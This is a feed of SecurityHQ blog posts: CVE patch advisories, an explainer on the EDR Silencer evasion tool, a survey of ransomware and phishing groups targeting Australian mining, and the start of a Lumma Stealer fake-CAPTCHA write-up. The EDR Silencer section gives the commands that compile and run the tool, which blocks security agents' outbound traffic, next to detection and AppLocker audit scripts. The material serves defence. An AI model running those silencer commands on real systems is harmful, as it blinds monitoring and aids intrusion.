Recommendations:

Update all affected products to the latest available patch version.

Fortinet Patches Critical Vulnerabilities

Threat Reference: Global

Risks: Privilege Escalation, Arbitrary Code Execution and Unauthorized Session Hijacking

Advisory Type: Updates/Patches

Priority: Standard

Fortinet has released patches to address high-severity vulnerabilities affecting its products. Successful exploitation of these vulnerabilities could result in Privilege Escalation, Arbitrary Code Execution, and Unauthorized Session Hijacking.

Affected products include FortiClientWindows, FortiAnalyzer, FortiAnalyzer-BigData, FortiManager, FortiManager Cloud, and FortiOS.

Notable CVEs:

  • [Critical] – CVE-2024-47575 – A missing authentication vulnerability in the FortiManager daemon may permit a remote, unauthenticated attacker to execute arbitrary code or commands through crafted requests.
  • [High] – CVE-2024-36513 – A privilege context switching error vulnerability in FortiClient for Windows may enable an authenticated user to gain elevated privileges by exploiting Lua auto-patch scripts.
  • [High] – CVE-2024-23666 – A client-side implementation of a server-side security vulnerability in FortiAnalyzer could allow an authenticated attacker with read-only access to carry out sensitive operations through crafted requests.

Recommendations:

Update all affected products to the latest available patch version.


The post November 2024 Threat Advisory – Top 5 appeared first on SecurityHQ.

What is an Endpoint Detection & Response (EDR) Silencer? https://www.securityhq.com/blog/what-is-an-endpoint-detection-response-edr-silencer/ Wed, 30 Oct 2024 11:00:56 +0000 https://www.securityhq.com/?p=11406 An Endpoint Detection & Response (EDR) silencer is a type of evasion technique or tool specifically created to disable, bypass, or reduce the effectiveness of EDR solutions. Learn how to detect and mitigate it.

An Endpoint Detection & Response (EDR) silencer is a type of evasion technique or tool specifically created to disable, bypass, or reduce the effectiveness of EDR solutions. Bad actors use EDR silencers to avoid detection, leading to prolonged dwell times (i.e., the amount of time an attacker remains undetected within a network). The longer an attacker goes undetected, the more opportunity they have to exfiltrate data, deploy ransomware, or execute other malicious actions.

EDR Silencer is a notable example of such a tool and is publicly available as open source on GitHub.

Its capabilities were originally developed within Night Hawk, a command-and-control (C2) framework marketed by MDSec Labs.

The fundamental concept behind this offensive tool is to leverage the Windows Filtering Platform, a built-in suite of system services present in Windows operating systems from Windows Vista onward, in order to stop EDR agents from communicating over the network.

Historically, the Windows Filtering Platform was designed for use by security applications such as firewalls, antimalware software, and similar protective solutions.

A Deep Dive into How EDR Silencer Operates

The code uses the Windows Filtering Platform (WFP) to enumerate the processes belonging to running EDR solutions and then installs WFP filters that block their outbound network traffic over both IPv4 and IPv6. This prevents EDR agents from relaying telemetry and alerts to their management consoles, undermining their operational effectiveness.

The commands below compile the code and then launch EDRSilencer.exe, which installs the filters that block outbound communication toward the management console.

x86_64-w64-mingw32-gcc EDRSilencer.c utils.c -o EDRSilencer.exe -lfwpuclnt

EDRSilencer.exe blocked

Figure 1: EDR Silencer Initiating EDR Blocking. Source: SecurityHQ Threat Labs

Figure 2 shows the Windows Filtering Platform (WFP) event for the custom outbound filter created by this execution to block outbound traffic. The filter was added as a persistent filter, so it remains in place across reboots rather than disappearing when the process exits.

Figure 2: Windows Filtering Platform Event on the Host. Source: SecurityHQ Threat Labs

Detection

Event Source: Microsoft Windows Security Event Log

Event Category: Process Creation and Success Audit

Event Name: Process creation followed by Success Audit: A Windows Filtering Platform filter has been changed.

Event ID: 5447

Detection and Alerting Parameters: Configurable conditions to tune alert generation include:

Change Information: <Delete/Add>

Filter Information: <Name>

Filter Information: <Persistent>

Layer Information: <Name>

Additional Information: <Filter Action>

These parameters allow for comprehensive monitoring and alerting on activities involving changes to Windows Filtering Platform filters, specifically restricted to known custom outbound filter additions.

Figure 3: Custom Parameters. Source: SecurityHQ Threat Labs
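A hunting script that applies the parameters listed above to the Security log, as an added example that is not SecurityHQ's own detection content. It reads event 5447, keeps only persistent outbound block-filter additions whose name is not on an allow-list, and then lists the processes created (event 4688) in the minute before each hit, which is the "process creation followed by filter change" pairing the Event Name above describes. Assumptions: an elevated session, the "Filtering Platform Policy Change" and "Process Creation" audit subcategories enabled, and the EventData field names (ChangeType, FilterName, FilterType, LayerName, Action, UserName, NewProcessName, CommandLine) as they appear in the 5447 and 4688 XML on current Windows builds.

```powershell
# Added example, not from the SecurityHQ post.
# Hunts for suspicious WFP filter additions (Security event 5447) matching the
# alerting parameters above, and shows process creations (4688) just before each.
# Assumptions: elevated session; WFP policy-change and process-creation auditing
# enabled; EventData field names as observed on current Windows builds.

function ConvertTo-EventDataTable {
    # Flattens the <EventData><Data Name="..."> elements of a record into a hashtable.
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Record)
    $xml = [xml]$Record.ToXml()
    $table = @{}
    foreach ($node in $xml.Event.EventData.Data) { $table[$node.Name] = $node.'#text' }
    return $table
}

function Get-SuspiciousWfpFilterAdds {
    param(
        [datetime]$Since = (Get-Date).AddDays(-1),
        # Filter names your own EDR/firewall stack legitimately creates; tune per estate.
        [string[]]$KnownFilterNames = @()
    )
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5447; StartTime = $Since } -ErrorAction SilentlyContinue
    foreach ($ev in $events) {
        $d = ConvertTo-EventDataTable -Record $ev
        $isAdd        = $d['ChangeType'] -eq 'Add'          # Change Information: Add
        $isPersistent = $d['FilterType'] -eq 'Persistent'   # Filter Information: Persistent
        $isBlock      = $d['Action']     -eq 'Block'        # Additional Information: Filter Action
        # EDR Silencer targets the outbound (ALE connect) layers for IPv4 and IPv6.
        $isOutbound   = $d['LayerName']  -match 'Connect|Outbound'   # Layer Information: Name
        $isUnknown    = $KnownFilterNames -notcontains $d['FilterName']   # Filter Information: Name
        if ($isAdd -and $isPersistent -and $isBlock -and $isOutbound -and $isUnknown) {
            [pscustomobject]@{
                Time       = $ev.TimeCreated
                User       = $d['UserName']
                FilterName = $d['FilterName']
                Layer      = $d['LayerName']
                Action     = $d['Action']
            }
        }
    }
}

function Get-PrecedingProcessCreations {
    # Process-creation events (4688) in the window before a filter change. Time-based
    # correlation avoids depending on how the two events format process IDs.
    param([datetime]$At, [int]$WindowSeconds = 60)
    $procs = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $At.AddSeconds(-$WindowSeconds); EndTime = $At } -ErrorAction SilentlyContinue
    foreach ($p in $procs) {
        $d = ConvertTo-EventDataTable -Record $p
        [pscustomobject]@{ Time = $p.TimeCreated; Process = $d['NewProcessName']; CommandLine = $d['CommandLine'] }
    }
}

# Pass the filter names your own security tooling creates so they are not reported.
$hits = @(Get-SuspiciousWfpFilterAdds -KnownFilterNames @())
foreach ($hit in $hits) {
    $hit | Format-List
    Get-PrecedingProcessCreations -At $hit.Time | Format-Table -AutoSize
}
Write-Host ("{0} suspicious persistent outbound block filter(s) found." -f $hits.Count)
```

Populate KnownFilterNames from a clean reference host before deploying this at scale; legitimate firewall and EDR products also add persistent block filters, and without that allow-list the query reports them too. CommandLine in 4688 is only present when command-line auditing is enabled.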

SecurityHQ Recommendations


Restricting Portable Executables

Prevent executables from running in commonly used directories, like Downloads, Desktop, and Temp. Policies in Group Policy Object (GPO) or AppLocker can block execution from these directories. This approach stops users from inadvertently launching unapproved portable executables directly from common folders.

Group Policy Object (GPO) Restrictions

Configure Group Policies to prevent access to specific command-line interpreters.

  • Disable PowerShell: Set policies to restrict powershell.exe and powershell_ise.exe, or configure PowerShell Constrained Language Mode to limit available commands and prevent script execution.
  • Block Command Prompt: GPO allows blocking of cmd.exe for non-admin users by navigating to User Configuration > Administrative Templates > System and enabling “Prevent access to the command prompt”.

Application Whitelisting and Software Restriction Policies (SRP)

Use tools like Microsoft AppLocker or SRP to restrict access to GCC binaries. Configure rules that allow GCC only on machines designated for development. AppLocker can target applications based on user roles, so non-developer machines won’t have the permissions to execute the compiler.
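An audit of the effective AppLocker policy against the two recommendations above (denying execution from user-writable folders and denying compiler binaries on non-developer machines), as an added example that is not SecurityHQ's or Microsoft's own code. It only reads the policy; rule authoring stays in the GPO or AppLocker console. Assumptions: an elevated session, Get-AppLockerPolicy available, and the documented AppLockerPolicy XML schema (RuleCollection Type="Exe" containing FilePathRule elements with an Action attribute and a Conditions/FilePathCondition Path). The directory patterns and compiler names are this example's choices, drawn from the directories and the GCC toolchain the post names.

```powershell
# Added example, not from the SecurityHQ post.
# Reports gaps between the effective AppLocker Exe policy and the hardening
# described above: missing Deny path rules for user-writable folders and the
# absence of an explicit Deny for GCC-style compiler binaries.
# Assumptions: elevated session; AppLocker cmdlets present; documented policy XML schema.

function Get-AppLockerDenyGaps {
    param(
        # Path patterns a hardened policy should deny in the Exe collection (example choices).
        [string[]]$RequiredDenies = @(
            '%OSDRIVE%\Users\*\Downloads\*',
            '%OSDRIVE%\Users\*\Desktop\*',
            '%OSDRIVE%\Users\*\AppData\Local\Temp\*',
            '%WINDIR%\Temp\*'
        ),
        # Compiler binaries that non-developer machines should not be able to run.
        [string[]]$CompilerNames = @('gcc.exe', 'x86_64-w64-mingw32-gcc.exe')
    )

    [xml]$policy = Get-AppLockerPolicy -Effective -Xml
    $exe = $policy.AppLockerPolicy.RuleCollection | Where-Object { $_.Type -eq 'Exe' }
    if (-not $exe) {
        # No Exe collection at all: nothing is restricted.
        return [pscustomobject]@{ Enforcement = 'None'; MissingDenies = $RequiredDenies; CompilerDenied = $false }
    }

    # Collect every Deny path pattern in the Exe collection.
    $denyPaths = @(
        $exe.FilePathRule |
            Where-Object { $_.Action -eq 'Deny' } |
            ForEach-Object { $_.Conditions.FilePathCondition.Path }
    )

    # A Deny that ends in "\*" also covers every child path, so test each required
    # pattern against the existing patterns as wildcards rather than by equality.
    $covered = @($RequiredDenies | Where-Object {
        $want = $_
        @($denyPaths | Where-Object { $want -like $_ }).Count -gt 0
    })
    $missing = @($RequiredDenies | Where-Object { $covered -notcontains $_ })

    # Is any Deny rule aimed at a compiler binary by file name?
    $compilerDenied = @($denyPaths | Where-Object {
        $path = $_
        @($CompilerNames | Where-Object { $path -like "*\$_" }).Count -gt 0
    }).Count -gt 0

    [pscustomobject]@{
        Enforcement    = $exe.EnforcementMode   # Enabled, AuditOnly or NotConfigured
        MissingDenies  = $missing
        CompilerDenied = $compilerDenied
    }
}

Get-AppLockerDenyGaps | Format-List
```

Treat an Enforcement value other than Enabled as a gap in itself: AuditOnly logs would-be blocks but lets the executable run. On designated developer machines, run the audit with CompilerNames set to an empty array so the compiler check is skipped.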

Principle of Least Privilege

Grant every user and application only the minimum level of access required to perform its designated function.

For more information about this vulnerability, how it works, and how to protect against it, contact an expert, here.

The post What is an Endpoint Detection & Response (EDR) Silencer? appeared first on SecurityHQ.

October 2024 Threat Advisory – Top 5 https://www.securityhq.com/blog/october-2024-threat-advisory-top-5/ Tue, 22 Oct 2024 09:00:19 +0000 https://www.securityhq.com/?p=11382 SecurityHQ’s Monthly Threat Report, drawn from recent advisories of October 2024, showcases the top 5 threats and vulnerabilities of the month.

SecurityHQ’s Monthly Threat Report, Drawn from Recent Advisories of October 2024.

Ivanti Patches Multiple Vulnerabilities in Cloud Service Applications (CSA) Exploited in the Wild

Threat Reference: Global

Risks: Remote Code Execution, Privilege Escalation, and SQL Injection

Advisory Type: Updates/Patches

Priority: Standard

SecurityHQ has observed that Ivanti has released patches for multiple vulnerabilities classified as critical, high, and medium severity affecting Ivanti CSA (Cloud Services Application). Successful exploitation of these vulnerabilities could allow an authenticated attacker to perform remote code execution, privilege escalation, and SQL injection. Affected versions include Cloud Services Application (CSA) versions before 4.6.

Notable CVEs:

  • [Critical] – CVE-2024-8963 – Successful exploitation could allow a remote unauthenticated attacker to access restricted functionality.
  • [High] – CVE-2024-9380 – An OS command injection vulnerability in the admin web console of Ivanti CSA allows a remote authenticated attacker with admin privileges to obtain remote code execution.
  • [High] – CVE-2024-9381 – A path traversal vulnerability that allows an attacker with admin privileges to manipulate file paths in a way that can bypass access controls or restrictions.
  • [Medium] – CVE-2024-9379 – SQL injection in the admin web console of Ivanti CSA allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.

If CVE-2024-8963 is used in conjunction with CVE-2024-8190 an attacker can bypass admin authentication and execute arbitrary commands on the appliance.

Recommendation

Update the Ivanti Cloud Services Appliance (CSA) to 5.0.

Palo Alto has Released a Security Update to Fix Critical & High Severity Vulnerabilities

Threat Reference: Global

Risks: Command Injection, SQL Injection, Unauthenticated XSS, Sensitive Information.

Advisory Type: Threats

Priority: Standard

Palo Alto Networks has released security updates to fix multiple critical and high-severity vulnerabilities in the Expedition tool. These vulnerabilities allow attackers to read Expedition database contents and arbitrary files, as well as write arbitrary files to temporary storage locations on the system. The exposed information includes usernames, cleartext passwords, device configurations, and API keys for PAN-OS firewalls.

Affected products include the Palo Alto Networks Expedition tool.

Notable CVEs:

  • [Critical] – CVE-2024-9463 – An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
  • [Critical] – CVE-2024-9464 – An OS command injection vulnerability in Palo Alto Networks Expedition allows an authenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
  • [Critical] – CVE-2024-9465 – An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.
  • [High] – CVE-2024-9466 – A cleartext storage of sensitive information vulnerability in Palo Alto Networks Expedition allows an authenticated attacker to reveal firewall usernames, passwords, and API keys generated using those credentials.
  • [High] – CVE-2024-9467 – A reflected XSS vulnerability in Palo Alto Networks Expedition enables execution of malicious JavaScript in the context of an authenticated Expedition user’s browser if that user clicks on a malicious link, allowing phishing attacks that could lead to Expedition browser session theft.

SecurityHQ has identified proof-of-concept exploits, published on 10th October 2024, for CVE-2024-9464, which has a CVSS score of 9.3, indicating critical severity. However, no active exploitation or association with threat actors or malware variants has been observed.

Recommendation

Update to Expedition version 1.2.96 or later. After upgrading to the fixed version of Expedition, all Expedition usernames, passwords, and API keys should be rotated. Additionally, all firewall usernames, passwords, and API keys processed by Expedition should be rotated. The cleartext file affected by CVE-2024-9466 will be automatically removed during the upgrade.

Cisco Releases Security Updates to Patch Critical and High-Severity Vulnerabilities

Threat Reference: Global

Risks: Remote Code Execution, Privilege Escalation, Arbitrary Code Execution, Exposure of sensitive information.

Advisory Type: Threats

Priority: Standard

SecurityHQ has observed that Cisco has released security updates to address critical and high-severity vulnerabilities across several of its products. Successful exploitation of these vulnerabilities could result in remote code execution, privilege escalation, arbitrary code execution, and exposure of sensitive information.

Affected Products include Cisco NDFC, Cisco RV340 Dual WAN Gigabit VPN Routers, Cisco RV340W Dual WAN Gigabit Wireless-AC VPN Routers, Cisco RV345 Dual WAN Gigabit VPN Routers, and Cisco RV345P Dual WAN Gigabit PoE VPN Routers.

Notable CVEs:

  • [Critical] – CVE-2024-20432: A vulnerability in Cisco Nexus Dashboard Fabric Controller (NDFC) allows low-privileged, authenticated attackers to perform command injection via the REST API or web UI. This is due to improper authorization and command validation, enabling arbitrary command execution with network admin privileges.
  • [High] – CVE-2024-20449 – A vulnerability in Cisco Nexus Dashboard Fabric Controller (NDFC) allows authenticated, low-privileged remote attackers to successfully execute arbitrary code due to improper path validation. Attackers can exploit this by using path traversal techniques to upload malicious code via Secure Copy Protocol (SCP), enabling code execution in a specific container with root privileges.
  • [High] – CVE-2024-20393: A vulnerability in Cisco Small Business RV340, RV340W, RV345, and RV345P routers’ web management interface could allow an authenticated, remote attacker to elevate privileges. This vulnerability exists due to sensitive information disclosure. A successful exploit could allow an attacker to elevate privileges from guest to admin.
  • [High] – CVE-2024-20470: A vulnerability in Cisco Small Business RV340, RV340W, RV345, and RV345P routers’ web management interface allows an authenticated, remote attacker with admin credentials to execute arbitrary code. This occurs due to insufficient input validation. A successful exploit could enable arbitrary code execution as the root user on the underlying system.

SecurityHQ was not able to observe any evidence of these vulnerabilities being exploited in the wild, nor any association with a malware variant or threat actor.

Recommendation

Update all the affected products to the latest available patch version.

Oracle Released a Critical Patch Update for October 2024

Threat Reference: Global

Risks: Remote Code Execution (RCE), Privilege Escalation, Denial of Service (DoS), Unauthorized Access, Information Disclosure, Cross-Site Scripting (XSS).

Advisory Type: Threats

Priority: Standard

Oracle has released its quarterly Critical Patch Update, addressing a total of 334 new security patches across multiple Oracle product families. These updates mitigate vulnerabilities that could allow attackers to execute code remotely, escalate privileges, cause denial of service, disclose information, perform cross-site scripting, or gain unauthorized access to systems.

Out of all security patches, 29 vulnerabilities were identified for Oracle Access Manager, 27 vulnerabilities for Oracle E-Business Suite, followed by Oracle Database Server and Oracle Fusion Middleware with 23 and 24 vulnerabilities, respectively.

Affected Products include Oracle Fusion Middleware, Oracle Communications, Oracle MySQL, Oracle Financial Services, Oracle Database Server, Oracle E-Business Suite, Oracle Java SE, Oracle PeopleSoft, Oracle Enterprise Manager, Oracle GoldenGate, Oracle Health Sciences, Oracle JD Edwards, Oracle Utilities Applications, Oracle Retail Applications, Oracle Virtualization, Oracle Secure Backup, Oracle Construction and Engineering, Oracle Hospitality, Oracle Policy Automation, Oracle NoSQL Database, and Oracle Systems.

Recommendation

Update all the affected products to the latest available patch version.

Microsoft Released its October 2024 Patch Tuesday for 118 flaws with 43 Remote Code Execution Vulnerabilities

Threat Reference: Global

Risks: Remote Code Execution, Privilege Escalation, Security Feature Bypass, Information Disclosure, Denial of Service and Spoofing.

Advisory Type: Threats

Priority: Standard

Microsoft has released its Patch Tuesday for October 2024 with security updates for 118 flaws with 43 Remote Code Execution Vulnerabilities. Successful exploitation of these vulnerabilities could result in Remote Code Execution, Privilege Escalation, Security Feature Bypass, Information Disclosure, Denial of Service, and Spoofing.

Notable CVEs:

  • [Critical] – CVE-2024-43468 – Microsoft Configuration Manager Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-43488 – Visual Studio Code extension for Arduino Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-43582 – Remote Desktop Protocol Server Remote Code Execution Vulnerability

For the full list of important and moderate CVEs, take a look here.

Affected Products include Windows, Windows Server, Windows Kernel, Microsoft Office, Microsoft Outlook, Microsoft Dynamics, Microsoft SharePoint, SQL Server, Windows Kerberos, Azure, and PowerBI.

Recommendation

Update all the affected products to the latest available patch version.


The post October 2024 Threat Advisory – Top 5 appeared first on SecurityHQ.

Cyber Threats Targeting the Australian Mining Industry – Key Findings https://www.securityhq.com/blog/cyber-threats-targeting-the-australian-mining-industry-key-findings/ Mon, 14 Oct 2024 14:36:00 +0000 https://www.securityhq.com/?p=11360 SecurityHQ plays a crucial role in enhancing the operations of both IT and Operational Technology (OT) for our mining customers. By integrating security protocols that are tailored to the unique challenges of the mining sector, we ensure that both environments operate smoothly and securely.

According to data from Group-IB, over the last 365 days, there have been over 254 attacks targeting Australia. 65 attacks were made against the mining sector on a global level, and 5 of those attacks were specifically against Australian-based mining companies.

Whilst industries across the country face significant threats to their operations, the mining industry is of particular importance due to its significance to the Australian economy.

Australia’s Largest Export Industry

Mining is Australia’s largest export industry, making up about 50% of the country’s total exports. In the 2022-2023 fiscal year, these revenues reached $455 billion, as estimated by the Minerals Council of Australia.

In the same period, the number of Australians employed in the mining industry reached 200,000, with significant potential for expansion as the demand for rare metals, such as lithium, continues to grow.

A wide array of industries and service providers rely on and support the mining industry. Some of these sectors include the energy and chemical industries, where raw materials are used in the manufacturing process. Mining companies also contribute to the growth of other industries such as electronics.

Key Challenges the Mining Industry Faces

Across the globe, the competitive nature of natural resources, as well as their role in economic development, has made the mining industry an attractive target for cyber threats.

As companies become more reliant on automation and other data-sensitive systems, these attacks are likely to become increasingly destructive. Moreover, as softening commodity prices and other external factors have led to a slowdown in growth, the industry finds itself especially vulnerable.

  • Operational Disruption

As mining companies seek to modernise facilities, they have become increasingly dependent on automated and connective operational technologies to support remote workforces and control operations without being on-site.

Whilst this has brought numerous fiscal and safety benefits to the industry, it has also left companies vulnerable to attack wherever these systems are not configured and monitored correctly.

  • Data Theft

The highly sensitive nature of the information involved in the sector, such as geological surveys, creates further risks. Since the primary source of a mine’s value is determined by its ore reserves, a breach could prove especially destructive.

In addition to financial setbacks, data breaches pose a threat to employees’ personal information, causing further problems such as identity theft.

  • Ransomware Attacks

As mining operations become increasingly digitized, key components such as payroll are an attractive prospect for malicious actors. Ransomware attacks are a common means by which this data is encrypted and a ransom demanded for its release.

Listen to this podcast on the ransomware attack cycle here.

Aside from the obvious financial risks, the consequences of a ransomware attack could be far-reaching and cost significantly more in terms of downtime and data loss.

  • Supply Chain Vulnerabilities

As systems are interconnected within the mining industry, bad actors are well-positioned to infiltrate weaker, third-party connections. In this case, compromising a single link could have widespread consequences not only for mining companies but for an array of connected industries.

Read more about Supply Chain Attacks here.

How SecurityHQ Solves These Challenges

‘SecurityHQ’s SOCs play a crucial role in enhancing the operations of both IT and Operational Technology (OT) for our mining customers. By integrating security protocols that are tailored to the unique challenges of the mining sector, we ensure that both environments operate smoothly and securely. Our SOC provides comprehensive standards and guidelines that help businesses comply with industry regulations. This not only minimizes risks but also strengthens their overall security posture. Our proactive monitoring and incident response capabilities ensure that threats are identified and addressed swiftly, thus maintaining operational continuity and protecting valuable assets.’ – Lavannya Daga, Regional CSM Lead, APAC, SecurityHQ

Important security protocols across the industry that SecurityHQ supports, include:

  • Access Control: Implement strict access controls to ensure that only authorized personnel can access sensitive areas and systems.
  • Real-Time Monitoring: Deploy continuous monitoring solutions to detect anomalies and security breaches in real time. This includes intrusion detection systems (IDS) and Security Information and Event Management (SIEM) tools.
  • Incident Response Plans: Develop and regularly update incident response plans specific to mining operations. This ensures quick and effective action in the event of a security breach or operational disruption.
  • Vulnerability Assessments: Conduct regular vulnerability assessments and penetration testing to identify and address weaknesses in the environment.
  • Compliance with Industry Standards: Adhere to industry standards and regulations, such as ISO/IEC 27001 for information security management and NIST guidelines for cybersecurity, by implementing a risk register and evaluating cyber posture.

Overall, the collaboration between the SecurityHQ SOC and mining operations fosters a safer, more resilient environment that supports both immediate and long-term business objectives. By implementing a few of these standards, we enable stakeholders across the organization to have improved visibility into potential vulnerabilities and security incidents. – Lavannya Daga, Regional CSM Lead, APAC, SecurityHQ

Top Five Threat Groups Targeting Australia

  • INC Blog

INC Blog Ransomware is a recent cybercriminal group that has gained rapid notoriety. The group has distinguished itself through targeted ransomware attacks, as well as a focus on corporate and organisational networks.

  • LockBit

LockBit is a Russian-based cybercriminal group offering Ransomware-as-a-Service (RaaS). The software enables malicious actors to carry out two-stage attacks in which a victim’s data is encrypted and ransomed. “From 1st April 2022 to 31st March 2023, LockBit accounted for 18% of the total reported Australian ransomware incidents.” – Australian Government

  • DragonForce

DragonForce is a Malaysian hacktivist group utilising a similar two-stage attack strategy to LockBit. DragonForce has proven particularly effective through its use of customised ransomware attacks, through which ‘threat actors can leverage tactics such as changing the filename extensions of encrypted files and terminating specific processes and services.’ – Group-IB

  • RansomHub

RansomHub is a Russian-oriented group that has claimed at least 227 victims in just 207 days through similar methods.

‘While RansomHub is not confined to a single industry and targets companies across various sectors, its primary targets are companies within the healthcare, finance, and government sectors.’ – Group-IB

  • CACTUS

CACTUS follows a similar double-extortion method. Since observation began twelve months ago, the group has found significant success attacking large commercial entities, including some of the largest companies in the US, Italy, and the UK.

Top Five Threat Groups Targeting the Mining Industry on a Global Level

There is a significant overlap between the top groups targeting Australia and those targeting the mining industry. INC Blog, LockBit, and DragonForce were observed again, in addition to Play and BlackBasta.

  • BlackBasta

BlackBasta is a ransomware operator that emerged in early 2022. Since then, the group has racked up several prominent enterprise victims, often originating in the US, UK, and Australia.

  • Play

Play is a ransomware group behind over 300 successful incidents since June 2022 according to Cybersecurity officials in the US and Australia.

Top Five Threat Groups Targeting the Mining Industry in Australia

  • BianLian

BianLian is a cybercriminal group targeting Australian critical infrastructure sectors in addition to professional services and property development since June 2022.

  • GTFire

First seen on the 18th of December 2023, GTFire is a group of threat actors abusing Google services to initiate phishing attacks. Their geographic reach is vast and includes the United Arab Emirates, Austria, Australia, Bangladesh, Belgium, Canada, Switzerland, Chile, China, Colombia, Costa Rica, Czech Republic, Germany, Denmark, Dominican Republic, Egypt, Spain, France, United Kingdom, Georgia, Greece, Hong Kong, Israel, India, Italy, Jamaica, Japan, Moldova, Mexico, Malaysia, Netherlands, Norway, New Zealand, Panama, Peru, Philippines, Pakistan, and Russia.

As well as multiple geographies, the group targets multiple industries. These include Advertising, Commerce, Consumer Goods, Education, Energy, Events, Financial Services, Government, Health Care, IT and Cyber Security, Internet Services, Manufacturing, Media & Entertainment, Telecommunications, Mining, Non-Profit, Consulting, Science and Engineering, Transportation, Travel and Hospitality.

  • Greatness

Greatness is a cybercrime platform offering ‘Phishing-as-a-Service’ to threat actors specifically targeting users of the Microsoft 365 cloud service. Read more about how to spot a phishing attack here.

  • Webvoice

On June 1, 2023, experts discovered a phishing campaign targeting corporate users from different countries, during which the attackers used an unidentified Microsoft 365 phishing kit. This campaign uses the domain webvoice[.]com[.]br to redirect victims to phishing pages.

The group was last seen on the 31st of October 2023, targeting multiple industries. These include Financial Services (Banking, Asset Management, Fintech, etc.), Professional Services (Business Development, Career Planning, Consulting, etc.), Advertising (Affiliate & Social Media Marketing), Agriculture and Farming, Biotechnology (Biopharma, Genetics, Life Science), E-commerce and Retail, Consumer Goods (Cosmetics, Electronics), Education (EdTech), Energy (Oil & Gas, Renewable), Health Care (Medical Devices, Pharmaceuticals), IT & Cyber Security, Manufacturing (Industrial, Machinery), Media & Entertainment, Real Estate, Science & Engineering (Various Fields), Software (Web Development, Robotics), Transportation and Travel.

Their geographic reach spans Albania, Austria, Australia, Spain, United Kingdom, India, United Arab Emirates, Bahrain, Brazil, Canada, Switzerland, China, Colombia, Costa Rica, Germany, Denmark, Estonia, France, Hong Kong, Israel, Italy, South Korea, Luxembourg, Mauritius, Malaysia, Netherlands, New Zealand, Philippines, Sweden, Singapore, United States, and Zambia.

  • A7xsurabaya

a7xsurabaya is an attacker who carries out phishing attacks targeting corporate users from different countries. The attacker was discovered on March 17, 2023, and remains active as of February 21, 2024. In these phishing attacks, the attacker uses Office365 phishing pages.

Their geographic reach includes the United Arab Emirates, Australia, Belgium, Canada, Switzerland, China, Costa Rica, Germany, Denmark, Finland, France, United Kingdom, Ghana, Hong Kong, Ireland, Italy, Netherlands, New Zealand, Philippines, Poland, Saudi Arabia, Sweden, Singapore, and the United States.

Industries targeted include Administrative Services (Facilities Support), Advertising, Agriculture, Artificial Intelligence, Clothing and Apparel, E-commerce and Retail, Community and Lifestyle (Elderly, Leisure, etc.), Consumer Goods (DIY, Furniture), Content and Publishing, Data and Analytics, Education (Higher Education, Training), Energy (Efficiency, Oil & Gas, Renewable), Financial Services (Banking, Asset Management, Insurance, etc.), Food and Beverage (Processing, Wine), Government and Military, Health Care (Hospitals, Medical Devices, Nutrition), Information Technology (Cyber Security, Network Security), Manufacturing (Various Fields), Media and Entertainment (Music, Publishing, Social Media), Professional Services (Consulting, Legal, Risk Management), Real Estate (Construction, Property Management), Science and Engineering (Aerospace, Biotechnology, etc.), Software (Enterprise, Mobile Apps), Transportation (Logistics, Public Transportation), Travel and Tourism.

Next Steps to Support Australian-Based Mining Companies

Australia’s latest cybersecurity strategy highlights a commitment towards better data security. Read more about the full strategy here: ‘SecurityHQ and Data#3 Join Forces to Leverage the Australian Cyber Security Strategy 2023-2030’.

The success of this plan greatly depends on companies taking important steps to bolster their defences. Together, SecurityHQ and Data#3 aim to give Australian businesses the opportunity to build a safer and more secure working environment.

‘As these threats evolve, it’s crucial for mining companies to prioritize cybersecurity to safeguard their operations and protect their valuable data. In an era where cyber threats are constantly evolving, staying ahead of the game is crucial. The mining industry must invest in cybersecurity to safeguard its future.’ – Patrick McAteer, Cyber Threat Intelligence Analyst, SecurityHQ 

For more information on how you can protect your data, contact our Australian-based team today.

Resurgence in Lumma Stealer Malware Campaigns – Notes from the Field
https://www.securityhq.com/blog/resurgence-in-lumma-stealer-malware-campaigns-notes-from-the-field/
Wed, 02 Oct 2024 09:14:28 +0000

‘Lumma Stealer’, also known as ‘LummaC2 Stealer’ and just ‘Lumma’, is a form of Russian-based malware sold as a Malware-as-a-Service that has been available on dark web forums since 2022. This particular form of malware has been observed targeting multiple industries via browser extensions and two-factor authentication processes.

‘At SecurityHQ, we have observed Lumma Stealer’s global impact against multiple industries, including IT, media, and manufacturing, where users were compromised by this campaign. Lumma Stealer is known to exfiltrate host details and browser data from the compromised machines, and we have seen some “.shop” domains spreading these malware files.’ – Ranjit Patil, SME-Malware Analysis, SecurityHQ

What SecurityHQ Analysts Observed

SecurityHQ has observed two new campaigns to distribute the Lumma Stealer malware, a potent information-stealing threat. These campaigns utilize deceptive tactics, including phishing sites and pirated software, to infect victims’ systems and exfiltrate sensitive data.

1. Fake CAPTCHA Pages

The first method uses fake CAPTCHA pages hosted on phishing sites, often fronted by Content Delivery Networks. These sites trick users into performing keyboard commands, such as “Windows + R” and “CTRL + V”, which unwittingly execute a PowerShell script.

The website contains JavaScript that copies the PowerShell script to the clipboard; when the user pastes it into the Run dialog and presses Enter, it executes as a script. This script then downloads and installs the Lumma Stealer malware onto the victim’s device. Once the second-stage payload is downloaded, the malware is executed from a ZIP archive, allowing the attacker to steal sensitive information.

Technical Analysis of Fake CAPTCHA Pages

Adversaries often host phishing websites on various platforms, including those that utilize Content Delivery Networks (CDNs). These malicious sites typically present users with a fake CAPTCHA page.

The sites force users to go through what looks like a CAPTCHA test. The fake CAPTCHA is designed to trick the user into believing they are completing a standard verification test to prove they are human and not a bot.

What to Look For

